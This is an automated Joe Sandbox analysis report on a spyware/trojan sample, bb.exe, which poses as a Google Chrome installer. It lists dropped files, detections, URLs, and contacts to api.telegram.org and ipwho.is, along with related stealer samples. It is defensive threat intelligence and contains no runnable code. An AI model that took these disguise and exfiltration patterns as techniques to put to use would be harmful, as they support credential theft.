powershell.exe 16->24         started        26 powershell.exe 16->26         started        66 Bypasses PowerShell execution policy 20->66 28 powershell.exe 1 33 22->28         started        file7 signatures8 process9 process10 30 conhost.exe 24->30         started        32 conhost.exe 26->32         started        34 conhost.exe 28->34         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            bb.exe13%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files\Google LLC\Google Chrome\setup.exe22%ReversingLabsWin64.Trojan.SpywareX
            C:\ProgramData\Caphyon\Advanced Installer\{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}\Google Chrome.exe11%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ExternalUICleaner.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\lzmaextractor.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI277B.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2E04.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2E63.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2EB2.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2F10.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2F50.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2F9F.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI2FCF.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI300E.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI305E.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI430C.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI438A.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSI43F8.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\shi269F.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\shiF4D1.tmp0%ReversingLabs
            C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.aiui11%ReversingLabsWin32.Trojan.Generic
            C:\Windows\Installer\MSI9F.tmp0%ReversingLabs
            C:\Windows\Installer\MSIFAEC.tmp0%ReversingLabs
            C:\Windows\Installer\MSIFBD7.tmp0%ReversingLabs
            C:\Windows\Installer\MSIFC17.tmp0%ReversingLabs
            C:\Windows\Installer\MSIFCA4.tmp0%ReversingLabs
            C:\Windows\Installer\MSIFEB8.tmp0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.carterandcone.comn-u0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://html4/loose.dtd0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnB0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://.css0%Avira URL Cloudsafe
            https://contoso.com/0%URL Reputationsafe
            http://www.founder.com.cn/cnt0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.tiro.comq0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://www.carterandcone.comt0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.founder.com.cn/cn40%URL Reputationsafe
            http://www.carterandcone.comftD0%Avira URL Cloudsafe
            http://.jpg0%Avira URL Cloudsafe
            http://cacerts.digicert.q?0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnbiol0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/=0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ipwho.is
            		108.181.47.111
            		truefalse
              		unknown
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://html4/loose.dtdbb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://www.fontbureau.com/designersGbb.exe, 00000000.00000003.229042431.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.229055225.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.carterandcone.comn-ubb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bThebb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.combb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersbb.exe, 00000000.00000003.227110877.00000000058B9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.goodfont.co.krbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://.cssbb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.carterandcone.combb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnBbb.exe, 00000000.00000003.224894504.0000000005899000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersRbb.exe, 00000000.00000003.227505209.00000000058B9000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.sajatypeworks.combb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/cThebb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.combb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comftDbb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://cacerts.digicert.q?bb.exe, 00000004.00000003.305263246.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308217276.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.306726397.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersbbb.exe, 00000000.00000003.227536327.00000000058B9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cntbb.exe, 00000000.00000003.225278682.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225258364.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225093469.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225182094.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225228360.000000000589D000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleasebb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.combb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleasebb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.269321572.0000000004FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sakkal.combb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://.jpgbb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.com/designerstbb.exe, 00000000.00000003.227151222.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227170553.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227162048.00000000058B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0bb.exe, 00000000.00000003.225452513.0000000005893000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225426696.0000000005894000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225377345.0000000005891000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225401958.0000000005894000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.combb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.carterandcone.comTCbb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/=bb.exe, 00000000.00000003.225093469.000000000589D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tiro.comqbb.exe, 00000000.00000003.225290062.0000000005893000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-3bb.exe, 00000000.00000003.225377345.0000000005891000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.carterandcone.comtbb.exe, 00000000.00000003.225401958.0000000005894000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225408789.000000000589C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.carterandcone.comlbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers&bb.exe, 00000000.00000003.229055225.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227122133.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.227110877.00000000058B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cnbb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnbiolbb.exe, 00000000.00000003.224894504.0000000005899000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlbb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cn4bb.exe, 00000000.00000003.224894504.0000000005899000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225021045.000000000589C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers=bb.exe, 00000000.00000003.227249238.00000000058B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              		api.telegram.orgUnited Kingdom
                                                              		62041TELEGRAMRUfalse
                                                              108.181.47.111
                                                              		ipwho.isCanada
                                                              		852ASN852CAfalse

                                                              General Information

                                                              Joe Sandbox Version:38.0.0 Beryl
                                                              Analysis ID:1305316
                                                              Start date and time:2023-09-07 16:40:34 +02:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 14m 3s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:30
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample file name:bb.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@19/97@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 72.21.81.240, 209.197.3.8
                                                              • Excluded domains from analysis (whitelisted): geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, arc.msn.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, kv601.prod.do.dsp.mp.microsoft.com, ris.api.iris.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, img-prod-cms-rt-microsoft-com.akamaized.net
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                              • VT rate limit hit for: bb.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              16:41:38API Interceptor1x Sleep call for process: bb.exe modified
                                                              16:42:00API Interceptor64x Sleep call for process: powershell.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220order#10038574.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                gzhmuE43dO.rtfGet hashmaliciousAgentTeslaBrowse
                                                                  Apratkg.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    u0khO3QSdo.exeGet hashmaliciousAveMaria, Gurcu StealerBrowse
                                                                      LNJV136bsw.exeGet hashmaliciousAgentTeslaBrowse
                                                                        w6cZ3m8GSg.exeGet hashmaliciousAgentTeslaBrowse
                                                                          ieC0tCkU3l.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            AA277Zsz87.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Vwlv0JMXHY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                SecuriteInfo.com.Win32.PWSX-gen.3274.9582.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  SecuriteInfo.com.Trojan.PackedNET.2317.22546.10019.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Purchase_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      LReFsVOfqQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        SecuriteInfo.com.Win32.RATX-gen.11161.10028.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          6NCrknlt7S.exeGet hashmaliciousUnknownBrowse
                                                                                            B56FP5J45y.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              SecuriteInfo.com.Win32.DropperX-gen.3244.24994.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.27101.4149.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                  Rendel#U00e9s_(PO4035247)_Trend-elektro_Kft.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    16938979727d2dd9e8f8db2cfe41fd911dd4077134775db457beedb4788283e28d29837b6b362.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      ipwho.iskjNeS72YG3.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 15.204.213.5
                                                                                                      Vdx0wJYZit.exeGet hashmaliciousNeshta, Quasar, Raccoon Stealer v2Browse
                                                                                                      • 195.201.57.90
                                                                                                      D5zZRec4IT.exeGet hashmaliciousQuasar, Raccoon Stealer v2Browse
                                                                                                      • 195.201.57.90
                                                                                                      t4v4BCINyk.exeGet hashmaliciousQuasar, Raccoon Stealer v2Browse
                                                                                                      • 195.201.57.90
                                                                                                      ab9W41mBrV.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      FI6utP1TPd.exeGet hashmaliciousQuasar, Raccoon Stealer v2Browse
                                                                                                      • 195.201.57.90
                                                                                                      FI6utP1TPd.exeGet hashmaliciousQuasar, Raccoon Stealer v2Browse
                                                                                                      • 195.201.57.90
                                                                                                      https://coral-app-mn55m.ondigitalocean.appGet hashmaliciousUnknownBrowse
                                                                                                      • 195.201.57.90
                                                                                                      utFuar3fbx.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      ctxljKRNiy.exeGet hashmaliciousGurcu Stealer, Quasar, RedLineBrowse
                                                                                                      • 195.201.57.90
                                                                                                      JYaMR24Bxd.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      APsglnLQvP.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      update_SC.batGet hashmaliciousUnknownBrowse
                                                                                                      • 195.201.57.90
                                                                                                      OperaSetup.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      hJ1T1FtR4w.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      OperaSetup.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      4.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      98F1vO7B8O.exeGet hashmaliciousLuca StealerBrowse
                                                                                                      • 195.201.57.90
                                                                                                      mCDXMf6vYi.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 195.201.57.90
                                                                                                      file.exeGet hashmaliciousLuca StealerBrowse
                                                                                                      • 195.201.57.90

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUorder#10038574.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      gzhmuE43dO.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Wedding_patched.scrGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      Apratkg.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RJN5qFjb95.exeGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      u0khO3QSdo.exeGet hashmaliciousAveMaria, Gurcu StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      LNJV136bsw.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      w6cZ3m8GSg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      ieC0tCkU3l.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      AA277Zsz87.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Vwlv0JMXHY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      WP8vT3auAy.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      fsq0XcPhGK.exeGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      OfYNxlFF4f.exeGet hashmaliciousVidar, onlyLoggerBrowse
                                                                                                      • 149.154.167.99
                                                                                                      majzCI9Dxh.exeGet hashmaliciousVidar, onlyLoggerBrowse
                                                                                                      • 149.154.167.99
                                                                                                      Ysb0DNvzGm.exeGet hashmaliciousVidar, onlyLoggerBrowse
                                                                                                      • 149.154.167.99
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.3274.9582.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      SecuriteInfo.com.Trojan.PackedNET.2317.22546.10019.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eLUqvXa6btC.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      NVNVqZEL3b.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.5152.23176.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      9xOGxv0NTQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      yeA0FkPFD0.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      3sY6d6YbcS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      file.exeGet hashmaliciousRisePro Stealer, VidarBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      123.exeGet hashmaliciousCrypto Miner, XmrigBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.25815.11108.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      UPuRFoV429.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      2Y9AyB52Ps.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      2Y9AyB52Ps.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      of6O0nAB8o.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      Halkbank_Ekstre_20222501_073653_270424.pdf____________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      42283523516_20230809_17202646_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
